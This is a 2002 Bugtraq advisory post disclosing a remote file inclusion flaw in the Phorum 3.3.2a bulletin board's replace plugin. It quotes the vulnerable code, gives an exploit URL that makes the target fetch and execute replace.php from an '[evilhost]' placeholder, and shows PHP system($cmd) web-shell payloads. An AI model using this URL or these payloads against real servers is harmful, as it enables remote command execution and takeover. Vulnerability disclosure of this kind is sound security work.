Bugtraq mailing list archives
Phorum 3.3.2a remote command execution
From: Markus Arndt <markus-arndt () web de>
Date: Fri, 17 May 2002 20:26:40 +0200
Target: Phorum 3.3.2a (prior versions?) Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external php scripts and execute arbitary code. Found by: Markus Arndt<markus-arndt () web de> Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed version available Details: After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders. I just snooped around a bit and found this file vulnerable for remote script inclusion: ./plugin/replace/plugin.php let's see some code: <?php include("$PHORUM[settings_dir]/replace.php"); function mod_replace_read_body ($body) { global $pluginreplace; reset($pluginreplace); while(list($key,$val) = each($pluginreplace)) { $body = str_replace($key,$val,$body); } return $body; } $plugins["read_body"]["mod_replace"]="mod_replace_read_body"; ?> Easy one.. http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls This one will get the file http://[evilhost]/replace.php and execute it. If [evilhost] has php enabled we could use this one as replace.php: <? echo("<? system(\"\$cmd\"); ?>"); ?> If it's not php-enabled simply: <? system("$cmd"); ?> Markus Arndt<markus-arndt () web de> http://skka.de ________________________________________________________________ Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Current thread:
- Phorum 3.3.2a remote command execution Markus Arndt (May 17)
- Re: Phorum 3.3.2a remote command execution Gabriel A. Maggiotti (May 18)
- Re: Phorum 3.3.2a remote command execution Thomas Seifert (May 20)
- Re: Phorum 3.3.2a remote command execution Gabriel A. Maggiotti (May 18)